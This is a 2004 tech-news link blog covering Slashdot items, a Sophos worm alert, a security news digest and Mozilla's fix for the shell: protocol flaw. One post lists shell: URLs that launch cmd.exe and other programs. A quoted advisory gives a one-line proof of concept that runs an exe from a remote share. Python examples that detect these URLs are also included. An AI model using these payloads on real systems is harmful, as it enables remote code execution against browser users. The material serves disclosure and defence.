QODS ec

Saturday, July 10, 2004

M$: Microsoft Faces Angry IE Users' Questions

Microsoft Faces Angry IE Users' Questions

/. : Carnegie Mellon Starts Offering Courses Online

Slashdot | Carnegie Mellon Starts Offering Courses Online

Posted by michael on Saturday July 10, @07:24PM
from the gotta-start-somewhere dept.
OckNock writes "Carnegie Mellon is offering free courses through its Open Learning Initiative. Unlike MIT's OpenCourseWare which has 700 courses available, Carnegie Mellon currently only has five courses available. However, Carnegie Mellon is unique in that they offer '...courses [that] include a number of innovative online instructional components such as: cognitive tutors, virtual laboratories, group experiments, simulations,' so rather than just offering course material Carnegie Mellon is pursuing a more interactive, community approach. Carnegie Mellon is also unique in that they offer the courses as an Academic Version which '...is offered through educational institutions for credit awarded by the student's home institution.' Interestingly, The William and Flora Hewlett Foundation funds both MIT's OpenCourseWare and Carnegie Mellon's Open Learning Initiative ('Funding for the Open Learning Initiative at Carnegie Mellon has been provided by The William and Flora Hewlett Foundation.') Sadly, the courses are not supported on any open source platforms or even any open source web browsers. More importantly, I'm curious how other universities will start making their courses available freely online."

LINK: Open Learning Initiative at Carnegie Mellon University

Open Learning Initiative at Carnegie Mellon University

BOOK: Free Downloads from Bruce Perens' Open Source Series

Free Downloads from Bruce Perens' Open Source Series

OT RealPlayer released under GPL

Technocrat.net | RealPlayer released under GPL

posted by Technocrat on Sunday June 27, @10:20PM


The NY Times broke this story embargoed for Monday at 8 PM Sunday night, but didn't give important details. See this story (registration required). So, before everyone gets confused: Several Linux distributions will now pick up RealPlayer because it is being released under the GPL. Real previously had their own Open Source license, but nobody wants to deal with yet another license. Most codecs are not going under GPL because Real does not own them, or doesn't own the technology (and has to license it). It is not clear to me at this time that the distributions picking this up will carry the non-free codecs, but most likely the software will download them on request. The "Ogg" free codecs for audio and video are definitely in there.

I think this has synergies for embedded devices such as cell phone handsets because of the tiny browser recently done by the Mozilla project with funding from Nokia.

Bruce


Open Clip Art Library :: openclipart.org

Open Clip Art Library :: openclipart.org

OT: Mozilla Optimization Mini-HOWTO

Mozilla Optimization Mini-HOWTO

SEC: Campaign Sites Lack Security

Wired News: Campaign Sites Lack Security

SEC: Homeland Security vulnerable to wireless hackers

CNN.com - Report: Homeland Security vulnerable to wireless hackers - Jun 30, 2004

SEC: VoIP hacks gut Caller I.D.

SecurityFocus HOME News: VoIP hacks gut Caller I.D.

VIRUS: W32/Agobot-WD

Gmail - Sophos Anti-Virus IDE alert: W32/Agobot-WD

Name: W32/Agobot-WD
Aliases: Backdoor.Agobot.gen, W32/Gaobot.worm.gen.f, Win32/Agobot.3.ABQ, W32.HLLW.Gaobot.gen, WORM_AGOBOT.WD
Type: Win32 worm
Date: 9 July 2004

A virus identity (IDE) file which provides protection is
available now from the Sophos website, and will be incorporated
into the September 2004 (3.85) release of Sophos Anti-Virus.

Customers using Enterprise Manager, PureMessage and any of the
Sophos small business solutions will be automatically protected
at their next scheduled update.

At the time of writing, Sophos has received just one report of
this worm from the wild.

Information about W32/Agobot-WD can be found at:
http://www.sophos.com/virusinfo/analyses/w32agobotwd.html

This IDE file also includes detection for:

W32/Rbot-DG
http://www.sophos.com/virusinfo/analyses/w32rbotdg.html

Download the IDE file from:
http://www.sophos.com/downloads/ide/agobotwd.ide

Download all the IDE files available for the current version of
Sophos Anti-Virus in a single compressed file. The file is
available in two formats:

Zip file:
http://www.sophos.com/downloads/ide/ides.zip

Self-extracting file:
http://www.sophos.com/downloads/ide/ides.exe

Read about how to use IDE files at
http://www.sophos.com/downloads/ide/using.html

SEC: shell: research

shell: research

I think the research over the past couple days proves that M$ just isn't
cutting it these days with their security response to vulnerabilities.
Wasn't it just the other day when Bill Gates said that they have 1000's of
consultants ready to patch systems and it STILL takes them weeks to patch a simple hole. I understand that M$ has to deal with the underlying OS but
with that many people shouldn't they turn patches out a little faster?
I mean, come on.. I worked with the Mozilla guys and was REALLY impressed
with the turn-around on the patch. It wasn't real elaborate to correct the issue but it was done in a matter of hours.

The shell: issue is all over Full-disclosure and slashdot but I have yet to see a public response from M$ on the issue.

I hope this helps Mozilla gain some market share because it's where browsing and security models should move in the future in my opinion-

----------end Rant---------------

M$ IE6 shell: vuln tested on fully patched XP SP1 box in VMware lab

shell:windows\system32\calc.exe
shell:windows\system32\cmd.exe
shell:windows\system32\winver.exe
shell:windows\system32\accwiz.exe

shell:windows\system32\narrator.exe <- This is my favorite one :) This will freak someone out when the PC talks to them.

I guess the good side to this is that IE asks the user to open the file / save if clicked from an anchor but not when using the shell command.
test <- this calls cmd.exe using an anchor tag



I understand the disclosure process but what can you do if they don't respond. This isn't a canned script kiddie exploit it's research. And that should be available to anyone that is interested.

--------------

I got 99 problems but Mozilla isn't one :)

OT: Mozilla Gains on IE

PCWorld.com - Mozilla Gains on IE

SEC: Microsoft Employee Suspect in AltaVista Hacking

Microsoft Employee Suspect in AltaVista Hacking

SEC: MOZILLA: SHELL can execute remote EXE program

Gmail - [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu
############################################################
[START] Advisory
############################################################

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

liudieyu

http://umbrella.name

############################################################
[START] PROOF OF CONCEPT
############################################################


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
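For filtering, the shell: URLs discussed in the "shell: research" post and in this advisory can be flagged in HTML before it reaches a browser or mail client. The following is an added example, not code from the advisory or from either browser project; the function names, the attribute list and the sample HTML are assumptions made for illustration.

```python
"""Flag shell: URLs in HTML content (added example, names are hypothetical)."""
from html.parser import HTMLParser

# Scheme the page's reports revolve around; extend the set for other handlers.
BLOCKED_SCHEMES = {"shell"}

# Attributes that commonly carry a URL (assumed list, not exhaustive).
URL_ATTRS = {"href", "src", "background", "action", "data"}

# Tolerant URL parsers drop tab/CR/LF and skip leading control characters
# and spaces, so the check normalizes the same way before comparing.
_IGNORED = {9: None, 10: None, 13: None}
_LEADING = "".join(map(chr, range(0x21)))


def url_scheme(url):
    """Return the lower-cased scheme of `url`, or '' if it has none."""
    cleaned = url.translate(_IGNORED).lstrip(_LEADING)
    scheme, sep, _ = cleaned.partition(":")
    return scheme.lower() if sep else ""


class ShellUrlFinder(HTMLParser):
    """Collects (line, tag, attribute, url) for every blocked-scheme URL."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lower-cased, and character
        # references in attribute values are already decoded here.
        line = self.getpos()[0]
        for name, value in attrs:
            if value and name in URL_ATTRS and url_scheme(value) in BLOCKED_SCHEMES:
                self.findings.append((line, tag, name, value))


def find_shell_urls(html_text):
    """Return all findings for one HTML document given as a string."""
    finder = ShellUrlFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


# Constructed sample: lines 3 and 4 reuse URLs quoted on this page,
# lines 2 and 5 are benign and must not be reported.
SAMPLE_HTML = r"""<html><body>
<a href="http://example.org/">ok</a>
<img src="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
<a href="SHELL:windows\system32\calc.exe">test</a>
<a href="docs/shell:notes.html">relative link, not a scheme</a>
</body></html>"""

if __name__ == "__main__":
    for line, tag, attr, url in find_shell_urls(SAMPLE_HTML):
        print(f"line {line}: <{tag} {attr}=...> uses a blocked scheme: {url}")
```

A gateway or proxy would quarantine or rewrite any document for which `find_shell_urls` returns a non-empty list.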

SEC: What Mozilla users should know about the shell: protocol security issue

What Mozilla users should know about the shell: protocol security issue


On July 7 a security vulnerability affecting browsers for the Windows operating system was reported to mozilla.org by Keith McCanless, and was subsequently posted to Full Disclosure, a public security mailing list. On the same day, the Mozilla security team confirmed the report of this security issue affecting the Mozilla Application Suite, Firefox, and Thunderbird and discussed and developed the fix at Bugzilla bug 250180. We have confirmed that the bug affects only users of Microsoft's Windows operating system. The issue does not affect Linux or Macintosh users.

On July 8th, the Mozilla team released a configuration change which resolves this problem by explicitly disabling the use of the shell: external protocol handler. The fix is available in two forms. The first is a small download which will make this configuration adjustment for the user. The second fix is to install the newest full release of each of these products. Instructions on administering these changes can be found below.

How to update

Mozilla, Firefox and Thunderbird users on Microsoft Windows operating systems should update in one of the following ways.

* To install the security patch for Mozilla or Firefox, follow these instructions:
   1. Click Install Patch.
   2. In the Software Installation window, click the "Install Now" button.
   3. Exit and restart your Mozilla or Firefox browser.
* To verify the fix in your Firefox or Mozilla application, be sure to restart the browser and then follow these steps:
   1. Type about:config into the address field and hit Enter.
   2. In the Filter toolbar, type shell.
   3. Look for the preference listing network.protocol-handler.external.shell.
   4. If you see the preference listed with the value of false then your application has been patched.
* To install the security patch for Thunderbird, follow these instructions:
   1. Right-click the Patch and choose save link as.
   2. Save the file, shellblock.xpi, to your Desktop.
   3. In Thunderbird, go to the Tools menu and select the Extensions item.
   4. In the resulting Extensions window, click the "Install" button.
   5. Use Windows file picker to select the shellblock.xpi file from your Desktop and click OK to dismiss the file picker.
   6. Click OK on the Software Installation window.
   7. Exit and restart Thunderbird.

* To download and install new Mozilla releases, follow the instructions below:
   1. Download Mozilla 1.7.1 to your Desktop and double-click the mozilla-win32-1.7.1-installer.exe icon.
   2. Follow the instructions in the Mozilla Install wizard.

   1. Download Firefox 0.9.2 to your Desktop and double-click the FirefoxSetup-0.9.2.exe icon.
   2. Follow the instructions in the Firefox Install wizard.

   1. Download Thunderbird 0.7.2 to your Desktop and double-click the ThunderbirdSetup-0.7.2.exe icon.
   2. Follow the instructions in the Thunderbird Install wizard.

We value our users' safety and security and will continue to make all efforts to release secure products and respond quickly when security vulnerabilities are identified in our software. Future versions of Mozilla Firefox will include automatic update notifications, which will make it even easier for users to be alerted to security fixes. The Mozilla Security Team would like to thank Keith McCanless for the original bug report and test case, and apologize for incorrectly omitting mention of his report in the initial version of this document.
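The about:config check in the verification steps can be repeated across many profiles by reading the preference files directly. The following is an added example, not Mozilla's code; it assumes profiles keep preferences as `user_pref("name", value);` lines in prefs.js and user.js, and the function names and sample text are hypothetical.

```python
"""Audit Mozilla-family profiles for the shell: handler preference (added example)."""
import re
import sys
from pathlib import Path

# Preference named in the verification steps above.
PREF_NAME = "network.protocol-handler.external.shell"

# One assignment per line: pref("name", value); or user_pref("name", value);
# Lines that start with // or # do not match, so commented-out entries are ignored.
PREF_LINE = re.compile(r'^\s*(?:user_pref|pref)\(\s*"([^"]+)"\s*,\s*(.*?)\s*\)\s*;')


def read_pref(text, name=PREF_NAME):
    """Return the last value assigned to `name` in prefs text, or None."""
    value = None
    for line in text.splitlines():
        match = PREF_LINE.match(line)
        if match and match.group(1) == name:
            value = match.group(2)  # a later assignment overrides an earlier one
    return value


def classify(value):
    """Map a raw preference value to an audit status."""
    if value is None:
        return "unset"       # inconclusive from profile files: confirm in about:config
    if value == "false":
        return "blocked"     # the state the steps above describe as patched
    if value == "true":
        return "enabled"     # external shell: handler explicitly allowed
    return "unexpected"      # not a boolean literal, inspect by hand


def audit_profile(profile_dir):
    """Return the status for one profile directory."""
    effective = None
    for filename in ("prefs.js", "user.js"):  # user.js is applied on top of prefs.js
        path = Path(profile_dir) / filename
        if path.is_file():
            found = read_pref(path.read_text(encoding="utf-8", errors="replace"))
            if found is not None:
                effective = found
    return classify(effective)


def audit_tree(root):
    """Audit every directory under `root` that contains a prefs.js file."""
    return {str(p.parent): audit_profile(p.parent)
            for p in sorted(Path(root).rglob("prefs.js"))}


# Constructed sample of a profile's prefs.js after the change has been applied.
SAMPLE_PREFS = """# Mozilla User Preferences
user_pref("browser.startup.homepage", "about:blank");
// user_pref("network.protocol-handler.external.shell", true);
user_pref("network.protocol-handler.external.shell", false);
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python audit_shell_pref.py <directory holding profile folders>
        for profile, status in audit_tree(sys.argv[1]).items():
            print(f"{status:10} {profile}")
    else:
        print("sample profile:", classify(read_pref(SAMPLE_PREFS)))
```

A status of `unset` means only that the profile files do not mention the preference; the effective value may still come from the application's defaults, so those machines need the manual about:config check.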

SEC: Security hole found in Mozilla browser

Security hole found in Mozilla browser | CNET News.com

SEC: [INFOCON] Security In The News - July 8, 2004

Gmail - [INFOCON] Security In The News - July 8, 2004

Security In The News

LAST UPDATED: 7/8/04

This report is also available on the Internet at
http://news.ists.dartmouth.edu/todaysnews.html

Terrorists Rely on Tech Tools:
PC World, 7/7/04

Feds Drag Feet on Cybersecurity:
PC World, 7/8/04

Officials bolster security, but not threat warning:
Government Executive, 7/8/04
Also - CNN, 7/8/04

HSIN starts five months early:
Federal Computer Week, 7/8/04

Home PCs Rented Out in Sabotage-For-Hire Racket:
Reuters, 7/7/04

U.S. wins appeal against alleged pirate:
C-Net News, 7/8/04
Also - The Register, 7/8/04

Spanish police: beware of lottery scam:
Computer Crime Research, 7/5/04

Phishing Attacks Linked To Organized Crime:
Security Pipeline, 7/7/04

Former Alta Vista employee arrested on hacking charges:
Duluth News Tribune (AP), 7/2/04

Court refuses to lift California e-voting restrictions:
C-Net News, 7/7/04
Also - Computerworld, 7/7/04
Also - Government Computer News, 7/7/04
Also - The Register, 7/8/04

Panelists push agencies to boost funding for IT research:
Government Executive, 7/7/04

Lawmakers Seek to Limit States on Internet Calls:
Reuters, 7/7/04
Also - Siliconvalley (AP), 7/7/04
Also - Wired News, 7/8/04

Libraries to comply with antiporn law or lose federal funding:
SearchSecurity, 7/8/04

Old-school worm loves Windows applications:
ZDNet News, 7/7/04
Also - Computer Weekly, 7/5/04

Password-stealing Trojan cut off at source:
ZDNet News, 7/7/04

Spanish Zombie PC virus author jailed:
The Register, 7/5/04

'Evaman virus not a major threat':
Sydney Morning Herald, 7/6/04
Also - ZDNet News, 7/5/04

Microsoft, biometrics firm to tackle homeland security:
ZDNet (Reuters), 7/7/04

Lax data security seen at many Japanese companies:
Computerworld, 7/7/04

E-mail glitch exposes private data in California:
Computerworld, 7/6/04

Security Failures Threaten Online Shopping:
Channel minds, 7/8/04

Web app vulnerabilities on the rise:
vnunet.com, 7/7/04

NIST offers technical guidance for e-authentication:
Government Computer News, 7/6/04
Also - Federal Computer Week, 7/7/04

Security spending rises, as do risks:
vnunet.com, 7/8/04

'Phonics' Co. Settles Privacy Complaint:
Washington Post (AP), 7/7/04
Also - Computerworld, 7/7/04
Also - MSNBC, 7/7/04

Postini: Half of all e-mail requests rejected:
Computerworld, 7/8/04

Homeland Security & Infrastructure Protection

Title: Terrorists Rely on Tech Tools
Source: PC World
Date Written: July 7, 2004
Date Collected: July 8, 2004
Speaking at the New American Foundation in Washington, DC, on July 7, 2004, Gabriel Weimann of the University of Haifa in Israel, said that terrorists are increasingly using the Internet to spread propaganda, recruit new members and raise money for future attacks. According to Mr. Weimann, the number of terrorist websites has grown by 571% since 1997, and terrorist groups such as Al Qaeda are increasingly putting training material, terrorist manuals and recruitment information online, in part to appeal to a new generation of potential terrorists. It is sometimes questioned why so few terrorist sites are taken offline - a possible answer may be that Western intelligence agencies are using the sites to gather information on terrorist plans and strategies. As terrorists' knowledge of the Internet and other technologies matures, the threat of cyberterrorism will grow.

http://www.pcworld.com/news/article/0,aid,116822,00.asp

Title: Feds Drag Feet on Cybersecurity
Source: PC World
Date Written: July 8, 2004
Date Collected: July 8, 2004
Some of the business representatives that took part in a major national effort to improve the state of cyber security are concerned that the US Department of Homeland Security (DHS) is taking too long to respond to security recommendations. In December 2003, DHS and several industry groups hosted a cyber security summit. At the summit, five task forces, comprised of representatives from industry, academia and government, were set up - the task forces issued reports with security recommendations in various areas in March 2004. However, "there has been a 'pregnant pause' waiting for a response," according to Rick White, CEO of TechNet. The task forces made numerous recommendations relating to cyber security standards and best practices, software security and security management, but DHS has, so far, failed to provide industry with security priorities or benchmarks based on the recommendations.

http://www.pcworld.com/news/article/0,aid,116818,00.asp

Title: Officials bolster security, but not threat warning
Source: Government Executive
Date Written: July 8, 2004
Date Collected: July 8, 2004
On July 7, 2004, FBI Director Robert Mueller and Homeland Security Department Undersecretary Asa Hutchinson briefed members of the US House of Representatives on current terrorist threats and ongoing security measures ahead of the political conventions in Boston at the end of July and New York City in late August and early September, 2004. Although intelligence reports indicate that terrorists continue to pose a serious threat to the US and are plotting attacks, there is currently no need to raise the terrorist threat level, according to Ms. Hutchinson. On July 8, 2004, Homeland Security Secretary Tom Ridge confirmed that Al Qaeda may be planning a "large-scale attack on the United States in an effort to disrupt the democratic process". However, he added that no specific information concerning the possible time, place or method of the attack was available.

http://www.govexec.com/story_page.cfm?articleid=28943&dcn=todaysnews
Also - http://www.cnn.com/2004/US/07/08/ridge.alqaeda/index.html

Title: HSIN starts five months early
Source: Federal Computer Week
Date Written: July 8, 2004
Date Collected: July 8, 2004
At a press conference in Washington, DC, on July 8, 2004, Homeland Security Secretary Tom Ridge announced that the Homeland Security Information Network (HSIN) is up and running five months ahead of schedule. HSIN is an unclassified network that connects the Homeland Security Operations Center with homeland security officials, law enforcement and first responders in all 50 states and major urban areas. The network will be used to distribute homeland security and terrorist information, intelligence and alerts to officials in real-time. Further, a pilot program is underway to link critical infrastructure owners and operators and other commercial entities in four cities to HSIN.

http://www.fcw.com/fcw/articles/2004/0705/web-hsin-07-08-04.asp

Cybercrime-Hacking

Title: Home PCs Rented Out in Sabotage-For-Hire Racket
Source: Reuters
Date Written: July 7, 2004
Date Collected: July 8, 2004
Police and security experts are increasingly concerned about botnets - networks of 'zombie' PCs that have been taken over by cyber attackers - that are being rented out to the highest bidder on the Internet and then being used for spamming, fraud and denial of service (DoS) attacks. According to a source in the UK's Scotland Yard computer crime unit: "Small groups of young people creating a resource out of a 10-30,000-strong computer network are renting them out to anybody who has the money." Security experts believe that teenage hackers play a leading role in setting up botnets, but criminal groups in Eastern Europe or elsewhere may be pulling the strings behind the scenes. Such botnets can be rented for anything from $100 per hour to thousands of dollars. There is little individuals or organizations can do to protect themselves against an attack from one of these massive networks of hijacked machines.

http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5605810

Title: U.S. wins appeal against alleged pirate
Source: C-Net News
Date Written: July 8, 2004
Date Collected: July 8, 2004
US authorities have won the latest round of the legal battle to extradite Hew Raymond Griffiths, a suspected leader of the software piracy group DrinkorDie, from Australia to face charges of conspiracy to commit criminal copyright infringement and copyright infringement in the US. Mr. Griffiths was indicted in the US in 2003, but his lawyer does not understand why he should not be tried in Australia, his country of residence. If successfully prosecuted in the US, Mr. Griffiths could face up to ten years in prison and a fine of up to $500,000, while the maximum sentence under Australian copyright laws would be five years in prison. The US Attorney's Office launched a major offensive against DrinkorDie in 2001. It alleges that the group "copied and distributed more than $50 million worth of pirated software, movies, games and music."

http://news.com.com/U.S.+wins+appeal+against+alleged+pirate/2100-1014_3-5260914.html
Also - http://www.theregister.co.uk/2004/07/08/drinkordie_suspect_remanded_again

Title: Spanish police: beware of lottery scam
Source: Computer Crime Research
Date Written: July 5, 2004
Date Collected: July 8, 2004
Spanish police are investigating a global Internet lottery scam that has conned unsuspecting victims out of thousands of euros. Authorities believe that criminal groups, most likely based in Madrid, Spain, are behind the scam. Internet users are notified that they have won a large prize in the National Spanish lottery, but are then required to pay thousands of euros in advance fees for paperwork and taxes. Not unsurprisingly, the 'winnings' are never paid out. Ki Hon Li of South Korea lost more than $50,000 in the scam.

http://www.crime-research.org/news/05.07.2004/469

Title: Phishing Attacks Linked To Organized Crime
Source: Security Pipeline
Date Written: July 7, 2004
Date Collected: July 8, 2004
US federal and state law enforcement agencies, including the Federal Bureau of Investigations (FBI) and the US Secret Service, are finding ties between online phishing scams and organized crime groups, mainly in the former Soviet bloc and Asia. Phishing scams involve sending out e-mails purporting to be from respected online businesses in an attempt to harvest personal and financial information. John Curran, supervisory special agent with the FBI's Internet Crime Complaint Center, says that while "a broad array of criminals...ranging from teenagers to grandmothers" are involved in phishing scams, organized crime groups are playing an increasing role. Such scams are facilitated by a network of hacker websites that sell phishing starter kits.

http://www.securitypipeline.com/22104197

Title: Former Alta Vista employee arrested on hacking charges
Source: Duluth News Tribune (AP)
Date Written: July 2, 2004
Date Collected: July 8, 2004
According to a statement from the US Attorney's office, 31-year old Laurent Chavet of Kirkland, Washington, was arrested in a Seattle suburb on July 2, 2004 for allegedly hacking into his ex-employer's computer network and causing damage in 2002. Mr. Chavet, who used to work for search engine company Alta Vista, has been charged with one count of unauthorized access to a protected computer and one count of reckless damage to a protected computer and, if convicted, could face up to ten years in prison and a $500,000 fine. He has been released on bail and is scheduled to be arraigned in San Francisco on July 20, 2004.

http://www.duluthsuperior.com/mld/duluthsuperior/business/9070347.htm

Politics-Legislation

Title: Court refuses to lift California e-voting restrictions
Source: C-Net News
Date Written: July 7, 2004
Date Collected: July 8, 2004
On July 6, 2004, federal judge Florence-Marie Cooper upheld an April 2004 directive by California Secretary of State Kevin Shelley that "decertified touch-screen voting machines and withheld future certification until vendors of those systems could meet specific security requirements, including voter-verifiable paper audit trails (VVPAT)." The directive had been challenged in court by four California counties (Riverside, San Bernardino, Kern and Plumas), as well as the American Association of People with Disabilities. Judge Cooper supported Mr. Shelley's decision to decertify voting machines, calling it rational and "designed to protect the voting rights of the state's citizens". Five other California counties have already reached agreement with Mr. Shelley and have had their voting machines recertified. With millions of Americans expected to cast their votes electronically in this year's presidential election, grave concerns about the security and reliability of electronic voting systems around the country have been raised by election officials and security experts.

http://news.com.com/Court+refuses+to+lift+California+e-voting+restrictions/2100-1028_3-5260214.html
Also - http://www.computerworld.com/governmenttopics/government/legalissues/story/0,10801,94372,00.html

Also - http://www.gcn.com/vol1_no1/daily-updates/26515-1.html

Also - http://www.theregister.co.uk/2004/07/08/getting_e-voting_security_right

Title: Panelists push agencies to boost funding for IT research
Source: Government Executive
Date Written: July 7, 2004
Date Collected: July 8, 2004
On July 7, 2004, technology and policy experts testified before a House Government Reform subcommittee on the US government's information technology (IT) research and development (R&D) efforts. According to Edward Lazowska, many major IT breakthroughs are the result of long-term government investment into basic research. However, recently, the government has not spent enough on IT R&D, especially in the area of cyber security, as evidenced by the fact that the Department of Homeland Security (DHS) is only using 2% of its $1 billion budget for R&D on cyber security to protect critical national infrastructures. However, other government entities, such as the National Institute of Standards and Technology (NIST) and the Department of Defense (DoD), are also conducting extensive IT and cyber security R&D, and the Bush administration's proposed budget for the next fiscal year allocates $2 billion for the National Coordination Office for Information Technology Research and Development program, which coordinates R&D activities across the federal government, academia and the private sector.

http://www.govexec.com/story_page.cfm?articleid=28939&dcn=todaysnews

Title: Lawmakers Seek to Limit States on Internet Calls
Source: Reuters
Date Written: July 7, 2004
Date Collected: July 8, 2004
On July 7, 2004, lawmakers on the House Energy and Commerce Committee heard arguments for and against regulating the growing Internet telephony market and voice-over-Internet protocol (VoIP) technologies. Representatives from Internet voice providers, such as Vonage Holdings Corp., warned that a patchwork of strict state and federal regulations could be complex and could stifle innovation and growth in the industry. Republicans on the committee and at the Federal Communications Commission (FCC) appear to share the view that VoIP regulations should be light, but some Democrats believe regulations will be necessary, particularly those "which pertain to universal service, access, emergency services, law enforcement, and individuals with disabilities," according to John Dingell, the ranking Democrat on the committee. Legislation was introduced on July 6, 2004 that would classify VoIP as an interstate service, placing it under federal regulatory jurisdiction.

http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5611807
Also - http://www.siliconvalley.com/mld/siliconvalley/9099737.htm

Also - http://www.wired.com/news/politics/0,1283,64131,00.html

Title: Libraries to comply with antiporn law or lose federal funding
Source: SearchSecurity
Date Written: July 8, 2004
Date Collected: July 8, 2004
The Children's Internet Protection Act (CIPA) took effect on July 1, 2004. The law will force public libraries to implement Internet filtering to prevent children from viewing pornography or other harmful content on library PCs or face the loss of government technology funding in the form of E-Rate technology discounts. School administrators didn't join a legal challenge by the American Library Association against the law, so many are already adhering to the CIPA's requirements. Experience at schools, captured by a recent survey sponsored by Internet and e-mail filter maker St. Bernard Software Inc., has shown that online filters are imperfect and implementing and managing them can be costly and complicated.

http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci991888,00.html

Malware

Title: Old-school worm loves Windows applications
Source: ZDNet News
Date Written: July 7, 2004
Date Collected: July 8, 2004
Anti-virus companies have discovered three new variants of the Lovegate Internet worm (Lovgate.AD, Lovgate.AE and Lovgate.AH) this week. Like earlier versions of the worm, the new Lovegate variants spread via e-mail and network file-sharing and by exploiting an old Microsoft Windows vulnerability. The latest variants have been classified as medium risk by McAfee because they use the old, but dangerous, tactic of overwriting executable files on the local hard drive with copies of themselves. This is dangerous because it could lead to the destruction of a large number of executable files on an infected computer.

http://zdnet.com.com/2100-1105_2-5260304.html
Also - http://www.computerweekly.com/articles/article.asp?liArticleID=131726

Title: Password-stealing Trojan cut off at source
Source: ZDNet News
Date Written: July 7, 2004
Date Collected: July 8, 2004
According to security firm Symantec, the threat posed by a new password-stealing Trojan, dubbed PWSteal.Refest, has been contained by shutting down the site where stolen information was being sent. The Trojan, which was discovered last week, logged keystrokes and passwords of users of infected machines. PWSteal installed itself through a pop-up advertisement when users logged onto the websites of any one of nearly 50 financial institutions by exploiting a vulnerability in Microsoft's Internet Explorer (IE) web browser. Symantec has not received any reports of information theft from its Asian customers, according to Tim Hartman, Symantec Asia-Pacific's senior technical director.

http://news.zdnet.co.uk/0,39020330,39159780,00.htm

Title: Spanish Zombie PC virus author jailed
Source: The Register
Date Written: July 5, 2004
Date Collected: July 8, 2004
Valencia Crown Court has sentenced a Spanish man, 26-year old Óscar López Hinarejos, to two years in prison and ordered him to pay compensation to his victims for writing the Cabronator Trojan. Mr. López Hinarejos is the first virus writer to be jailed in Spain. He was arrested by the Spanish Civil Guard in April 2003. The Trojan infected 100,000 computers, turning them into 'zombies' as part of an attack network of infected PCs. Hackers also used Cabronator to collect personal information from infected machines.

http://www.theregister.co.uk/2004/07/05/spanish_vxer_jailed

Title: 'Evaman virus not a major threat'
Source: Sydney Morning Herald
Date Written: July 6, 2004
Date Collected: July 8, 2004
The Evaman Internet virus, discovered by anti-virus companies over the July 4, 2004 weekend, does not appear to be a major threat. On July 5, 2004, security firm Symantec classified Evaman as a 'category two threat' on a scale that goes up to category five for major outbreaks. The worm is spreading more slowly than had initially been expected. Evaman has been linked to the MyDoom worm that caused extensive damage and disruption in January 2004. Evaman arrives as an e-mail attachment and comes with subject headings like 'failed transaction' and 'failure delivery'. Users are urged not to open suspicious e-mail attachments and to upgrade their anti-virus software.

http://www.smh.com.au/articles/2004/07/06/1089000120633.html
Also - http://news.zdnet.co.uk/internet/0,39020369,39159581,00.htm

Technology

Title: Microsoft, biometrics firm to tackle homeland security
Source: ZDNet (Reuters)
Date Written: July 7, 2004
Date Collected: July 8, 2004
Security software firm Saflink, maker of biometric security software for fingerprint readers and other access control technologies, on July 7, 2004, announced a partnership with software giant Microsoft Corp. to develop security solutions for the US Department of Homeland Security. The idea is to combine Saflink's software with Microsoft's business software, a move that should allow Saflink to get more government contracts. Commenting on the partnership, Mark Belk, Microsoft's chief architect for homeland security software, said: "Together, we provide a compelling solution for Homeland Security programs involving biometrics, smart cards, tamper-proof identities and physical security controls."

http://zdnet.com.com/2100-1105_2-5259889.html

Vulnerabilities & Exploits

Title: Lax data security seen at many Japanese companies
Source: Computerworld
Date Written: July 7, 2004
Date Collected: July 8, 2004
A survey contained in the Japanese government's annual White Paper on Information and Communications in Japan, which was published by the Ministry of Public Management, Home Affairs, Posts and Telecommunications (MPHPT) on July 6, 2004, shows that measures taken to protect the privacy and security of personal data stored on computers are inadequate or lacking completely in many organizations. According to the survey, based on responses from about 900 companies and public organizations, almost 42% of organizations have no special technical security measures in place to protect data, while only 5% encrypt data in storage and transit and a mere 1.1% use an intrusion detection system for databases holding personal information. Results in the area of organizational security measures are equally troubling, with 37.2% of companies having no special measures in place. There have been repeated reports in recent years about large-scale data security problems at Japanese companies and government agencies.

http://www.computerworld.com/securitytopics/security/story/0,10801,94368,00.html

Title: E-mail glitch exposes private data in California
Source: Computerworld
Date Written: July 6, 2004
Date Collected: July 8, 2004
California's Contra Costa County is launching an investigation after it became known that hundreds of internal e-mails containing sensitive personal information about county Superior Court commissioners and other workers were sent to a Swedish company over a two-year period. The county's CIO (chief information officer) Tom Whittington says a preliminary investigation has revealed that the problem was not caused by a computer virus or another form of cyber attack, but by some county employees using erroneous e-mail address books. Although counties and cities are exempt from SB 1386, California's landmark identity-theft law, some experts believe that Contra Costa County may be required to notify those affected of the security breach.

http://computerworld.com/securitytopics/security/privacy/story/0,10801,94336,00.html

Title: Security Failures Threaten Online Shopping
Source: Channel minds
Date Written: July 8, 2004
Date Collected: July 8, 2004
